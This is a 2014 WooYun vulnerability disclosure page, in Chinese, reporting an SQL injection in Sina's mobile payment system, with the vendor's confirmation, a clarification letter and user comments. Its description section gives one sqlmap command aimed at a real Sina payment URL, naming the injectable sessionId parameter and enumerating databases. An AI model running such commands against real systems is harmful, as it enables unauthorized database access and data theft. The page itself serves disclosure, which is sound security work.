漏洞概要
关注数(24)
关注此漏洞
漏洞标题:新浪无线支付系统SQL注入漏洞之二
相关厂商:新浪
提交时间:2014-09-15 01:34
修复时间:2014-09-15 21:37
公开时间:2014-09-15 21:37
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经修复
Tags标签:
无
漏洞详情
披露状态:
2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-15: 厂商已经确认,细节仅向厂商公开
2014-09-15: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
新浪支付系统SQL注入漏洞之二,不同的域名,不同的点
详细说明:
sqlmap -u "http://ota.pay.mobile.sina.cn/platform/orderConfirm.php?sessionId=6756219&paymentTag=alipayAccount" -p sessionId --dbms=mysql --dbs
漏洞证明:
修复方案:
版权声明:转载请注明来源 猪猪侠@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2014-09-15 09:09
厂商回复:
感谢关注新浪安全,漏洞修复中。
最新状态:
2014-09-15:新浪支付科技有限公司对乌云网站发布的WooYun-2014-76093和WooYun-2014-76094号漏洞的澄清函新浪支付于9月15日得知乌云网站公布了有关新浪支付系统漏洞的WooYun-2014-76093和WooYun-2014-76094号漏洞,公司非常重视,积极的开展自查工作,确认漏洞具体情况、影响范围和造成的影响。根据乌云网站提供的漏洞描述并验证,发现并非新浪支付系统存在的漏洞,此漏洞对新浪支付所经营的第三方支付业务不构成安全威胁和影响。新浪的相关部门已经修复此漏洞,并已公布了具体漏洞细节。非常感谢乌云对互联网安全事业做出的巨大贡献,也非常感谢所有合作伙伴对新浪支付业务的关注。
漏洞评价:
评论
-
2014-09-15 01:50 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2014-09-15 01:50 |
w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )
-
2014-09-15 02:16 |
雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
-
2014-09-15 07:16 |
齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)
-
2014-09-15 08:26 |
浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)
-
2014-09-15 08:36 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
@浮萍 @齐迹 此工具将会于近期上架乌云market
-
2014-09-15 08:40 |
bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)
-
2014-09-15 08:41 |
Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)
-
2014-09-15 08:48 |
浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)
-
2014-09-15 08:55 |
大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)
-
2014-09-15 09:36 |
黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)
-
2014-09-15 10:16 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
-
2014-09-15 11:34 |
铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
-
2014-09-15 22:45 |
Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)
-
2014-09-15 23:10 |
pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)
很好奇后端代码的逻辑,sessionId也能射...
-
2014-09-15 23:36 |
laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)
-
2014-09-16 00:34 |
动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)
-
2014-09-16 10:58 |
onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)
-
2014-09-16 14:47 |
Undoit ( 普通白帽子 | Rank:167 漏洞数:25 | 打酱油)
-
2014-09-18 09:03 |
一十一 ( 路人 | Rank:2 漏洞数:3 | 不想做黑客的安全测试不是优秀的cybercop。...)
-
2014-09-18 21:47 |
丸子响当当 ( 路人 | Rank:8 漏洞数:5 | 学习温习•••••••)
-
2014-09-20 11:04 |
刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)
-
2014-09-21 21:33 |
kaysen ( 路人 | Rank:8 漏洞数:3 | 折腾Python、Php、Linux)
-
2014-09-23 13:59 |
黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)
-
2014-10-10 18:14 |
随页清风 ( 普通白帽子 | Rank:131 漏洞数:41 | 剑有所指)